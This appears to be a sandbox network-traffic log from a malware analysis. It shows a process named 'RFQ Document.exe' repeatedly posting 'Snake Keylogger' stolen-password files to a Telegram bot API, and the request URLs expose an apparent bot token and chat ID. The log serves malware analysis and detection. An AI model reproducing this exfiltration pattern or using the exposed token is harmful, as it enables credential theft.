2021-09-28 05:58:21 UTC	8	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:21 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:21 UTC	8	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12584,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49826	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:32 UTC	79	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c925b1c0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:33 UTC	80	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 32 35 62 31 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c925b1c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:33 UTC	80	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:33 UTC	81	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12631,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49827	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:33 UTC	81	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c963ae9b Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:33 UTC	81	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 36 33 61 65 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c963ae9bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:33 UTC	82	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:33 UTC	82	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12632,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49828	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:33 UTC	83	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c9804bda Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:33 UTC	83	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 38 30 34 62 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c9804bdaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:33 UTC	83	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:33 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12633,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49829	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:33 UTC	84	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c99f48fa Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:33 UTC	85	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 39 66 34 38 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c99f48faContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:33 UTC	85	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:33 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:33 UTC	85	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12634,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49830	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:33 UTC	86	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c9be4785 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:33 UTC	86	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 62 65 34 37 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c9be4785Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:34 UTC	87	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:34 UTC	87	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12636,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49831	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:34 UTC	87	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c9dd5aad Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:34 UTC	88	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 64 64 35 61 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c9dd5aadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:34 UTC	88	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:34 UTC	89	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12637,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49832	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:34 UTC	89	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c9fc4469 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:34 UTC	89	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 66 63 34 34 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c9fc4469Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:34 UTC	90	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:34 UTC	90	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64 Data Ascii: 